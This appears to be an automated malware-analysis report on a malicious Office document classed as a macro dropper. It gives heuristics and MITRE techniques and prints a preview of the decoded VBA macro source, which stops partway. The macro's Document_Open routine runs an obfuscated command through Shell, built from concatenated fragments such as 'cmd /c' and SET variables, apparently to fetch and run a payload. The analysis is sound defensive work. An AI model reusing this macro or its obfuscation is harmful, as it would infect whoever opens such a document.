MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, which is used to execute external commands. The 'Document_Open' macro is triggered upon opening the document, and it attempts to execute a command constructed from concatenated strings. This functionality strongly suggests the document is designed to download and execute a secondary payload, characteristic of a dropper malware.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-7152102-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7152102-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27016 bytes |
SHA-256: d980162399db7de30c3cf1f96dfe1abbd149cebfcd2169dc6c4f3d3699c35e6b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CnbHrvUltaijFo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function HocDsTTHVuf()
On Error Resume Next
zjYVhm = ChrW(46)
ZpXJMt = ChrB(GzwFd)
QXPkwo = Hex(6756)
KucXYD = Atn(708)
LXiiAY = Oct(UmjdTp)
Dutuki = Chr(KSzzd)
End Function
Private Function JXtijzpKof()
On Error Resume Next
Esvwa = Fix(Qibqsw)
roaYr = IMkrEi
nPuPUj = Hex(IOmzfi)
WwoDR = CStr(izKOI)
End Function
Private Function SbZqjwGbtqi()
On Error Resume Next
MFVHsi = CByte(JAbcE)
wYZPjw = Atn(31542 / WQkjQz * 27414 - 22678)
DhsYi = CInt(66465 + BwvCtT + JNiWWL / mhdMwl)
hGlFm = ChrW(FXfwQt)
jGiOsm = Sgn(5)
bnJLTq = lFRfJ
Orwcra = 2343
End Function
Private Function kUvSiHO()
On Error Resume Next
RIvGFC = dESmPX
wWGYD = MjBch
PvdJzu = Rnd(4372)
juiFFA = ChrW(1436)
clINjj = Chr(fQZUwo)
End Function
Private Function UFIMzaiGPAXQS()
On Error Resume Next
AIbnb = 2
wjTGw = 413068242
vtArM = Cos(kCYPZ)
iZHVa = ChrW(81)
End Function
Private Sub Document_open()
On Error Resume Next
aasAJ = Tan(939)
jTvad = Cos(944)
NdKiFE = WInad
tiXMw = sKRCP
LILiI = Sin(3)
VBA.Shell "" + VhHmzhhouuwX + JjCDzVa + CVar("C") + ztmnCRiwjfmnGT + fwiAfhXDUQJz + cvNoiqIv + ZWRCGKEZ + TsijajOOKW + RszUsmRKJq + iPZYSdbG + NmJEoDfhQa + adQPBkC + iqkizOGVNQ + YFrTBF + UWismKwfr + XMFEt + LBwkLfLFT + ScljJWC + ifijNFLV + SXukAKzl + CNAvaGj + KoLkvBvnGd + zjVsZDmKHIp + BNbwh + lzXMNU + YtikrQ + LrHtzZw + GOaKbhdkiV + VirZozBOP + bJzEvSJ + WwJTRWjSmI + HTicYLzYlUHnj, 0
sDOtkl = CByte(224800985)
End Sub
Private Function uzXYzhkps()
On Error Resume Next
ipFrj = CDate(fjpZfB)
pFZMV = Int(6)
fdiWD = 5
XJmFX = 3979
psmiCb = Sqr(271145631)
KOzUA = Hex(441634975)
End Function
Private Function vujitMzIqkXDM()
On Error Resume Next
OmmiLh = 8
WRjzF = Round(92)
ToFwm = CSng(97)
AjDZu = Round(34456 * ZJTcJF + 19444 * 97925)
XPwtG = fczlY
GYpoa = Oct(AaSwaj)
OFfpw = 80
End Function
Private Function BPqXbasP()
On Error Resume Next
zXZzJN = Chr(mdBoYi)
fkLUBb = FtNOV
IFMOj = CBool(5228)
ArqPYO = CBool(FDfSaJ / ZzKcr)
pVmWj = 5
IYjoi = CInt(PwiCp)
End Function
Attribute VB_Name = "SowcUVL"
Function cvNoiqIv()
On Error Resume Next
nslCB = Atn(1)
RPFLT = Atn(24)
zZYfNHWH = CStr(Chr(dlrJbPWIlXGI + VpUjfwtazj + 109 + RQPivaHdOF + ThHNzYnNRlRJpo)) + "d rloZjw"
vDpOt = CDate(OPhXri)
rcUFc = Hex(8)
IfuzdCKOBBa = "N" + CStr(Chr(sDlHiCz + GcfAWIQSXNwqj + 99 + vMHjwFpHQBk + POQkCUswIN)) + "FaHs fb" + "L" + "HaT" + "SSiE"
BEaYdD = 3060
jVSCFA = BOpIkh
DCwwzTIc = "t" + CStr(Chr(BqSbMPMbKLV + GnRVPwlzw + 109 + wOoLjinz + zPXfDmX)) + "kqEUszC" + "WYOr lv"
nFcTBB = CDate(15108 + jBMcRJ)
kvXdrO = ChrB(RuLXUw + rNnfJB)
ErhGThqL = "i" + CStr(Chr(DsVTvhbb + JiEnJfwaA + 109 + XWjMJYtpLMN + zQautiHCulCZs)) + "SrhXTv & " + " %" + CStr(Chr(AFMWqcfWl + JhlhBvPRntED + 99 + kddkhmQwfp + qYKTtooGVaQNjG)) + "o" + CStr(Chr(oUvCfAFzCmE + MBwbCFrHTz + 109 + aBKMPAbdp + tDUqSLRH)) + "Sp"
zNqpW = CBool(43)
nqfsBr = "E" + CStr(Chr(kIYUlhBRTU + mEzvmnldqjF + 99 + YhOZvCs + pslsiTZLWnpOQP)) + "% /" + CStr(Chr(YiVHiEDiRM + rXScArPGKuJS + 99 + KRAoIRXDXYX + kpDaRTnTw)) + " CMd" + " /" + CStr(Chr(OYAkMiUDD + lhdEiOoAtEbbiR + 99 + rzPKLwmajQ + sDUURpDWwMkYf)) + " " + CStr(Chr(JmzVSFJdDno + uDVRbzHqkHJpO + 34 + fOqfOVdomv + iaQjdGObsrTz)) + " SET " + " lf7W=k" + "& set " + "a5=." + CStr(Chr(lZinjEUlzozIU + PiWGLZPTa + 99 + AJfovtwYjEJw + RwdbjUmuL)) + "o&"
cvNoiqIv = zZYfNHWH + IfuzdCKOBBa + DCwwzTIc + ErhGThqL + nqfsBr
OzHSA = Chr(NaJJi)
NiKqX = Cos(29315692)
End Function
Function ZWRCGKEZ()
On Error Resume Next
jKTWYLcHiT = "&" + " " + "sET " + " ST" + "F=E" + "@ht"
UuOGRGRR = "&&" + " sET uYf" + "j=o& " + " SeT ut" + "=/&&
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.